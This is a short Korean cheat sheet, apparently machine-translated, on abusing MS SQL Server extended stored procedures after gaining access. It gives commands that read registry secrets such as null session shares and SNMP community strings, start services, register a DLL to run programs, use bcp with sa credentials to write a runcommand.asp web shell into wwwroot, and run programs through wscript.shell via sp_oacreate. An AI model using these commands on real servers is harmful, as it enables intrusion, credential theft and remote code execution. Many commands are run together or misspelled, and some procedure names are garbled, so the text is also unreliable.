일부 SQL 확장
xp_regaddmultistring
xp_regdeletekey 키 이름을 삭제합니다
xp_regdeletevaluate 키 값
xp_regenumkeys enum
xp_regenumvalues
xp_regread에 대한
XP_RegreMoveMoveMutistring
xp_regwrite write
XP_AVAILABLEMEDIA 뷰 드라이브
XP_DIRRTREE 뷰 디렉토리
XP_ENUMDSNODBC 데이터 소스
XP_LOGINCONFIG 일부 서버 보안 구성에 대한 정보
XP_MAKECAB 패키지, 일부 DBO 권한을 먼저 사용할 수 있습니다
XP_NTSEC_ENUMDOMAINS ENUM 도메인 이름 관련 정보
xp_terminate_process 터미널 프로세스 및 IP
XP_LOGININFO 현재 로그인 계정입니다
SP_CONFIGURE 데이터베이스에서 컨텐츠를 검색합니다 (저는 이것이 매우 유용하다고 생각합니다)
SP_HELPEXTENDENDEDPROC는 모든 스토리지 확장을 가져옵니다
SP_WHO2 사용자, 로그인하는 호스트, 데이터베이스에서 수행하는 작업 등
일부 네트워크 정보
execxp_regreadhkey_local_machine,
'시스템/CurrentControlset/Services/Lanmanserver/Parameters',
'nullsessionshares'
SNMP 지원 네트워크 조사
execxp_regenumvalueshkey_local_machine,
'System/CurrentControlset/Services/SNMP/Parameters/ValidComm
단위
Telnet과 같은 일부 시스템 서비스를 시작하면 관리자 또는 일부 시스템 암호로 올 수 있습니다.
execmaster..xp_servicecontrol'start ','Schedule '
execmaster..xp_servicecontrol'start ','server '
sp_addextendedproc'xp_webserver ','c : /temp/xp_foo.dll '이 확장자는 프로그램을 실행할 수 있습니다
'Bulkinsert'구문을 사용하여 텍스트 파일을 임시 테이블에 삽입하십시오. 이 테이블을 만듭니다.
CreateTableFoo (LineVarchar (8000))
그런 다음 BulkInsert 작업을 수행하여 파일의 데이터를 테이블에 삽입하십시오.
bulkinsertfoofrom'c : /inetpub/wwwroot/admin/inc.asp '
bcp "select*fromText..foo"queryOutc : /inetpub/wwwroot/runcommand.asp-c-slocalhost-usa –pfoobar
'S'매개 변수는 쿼리를 실행하는 서버이며 'U'매개 변수는 사용자 이름이며 'P'매개 변수는 암호입니다. 여기 'foobar'입니다.
ActiveX 자동 스크립트를 생성 할 수있는 SQLServer에 몇 가지 내장 저장 프로 시저가 제공됩니다. 이 스크립트는 Windows 스크립트 인터프리터 또는 ASP 스크립팅 프로그램에서 실행되는 스크립트와 동일합니다. VBScript 또는 JavaScript를 사용하여 만들고 상호 작용합니다. 이 메소드를 사용하는 자동 실행 스크립트는 ASP 스크립트 또는 WSH 스크립트에서 Transact-SQL에서 무엇이든 할 수 있습니다.
'wscript.shell'객체를 사용하여 메모장 인스턴스를 만듭니다.
@Oint를 선언하십시오
execsp_oacreate'wscript.shell ',@oout
execsp_oamethod@o, 'run', null, 'notepad.exe'
사용자 이름 후에 실행하도록 지정하십시오.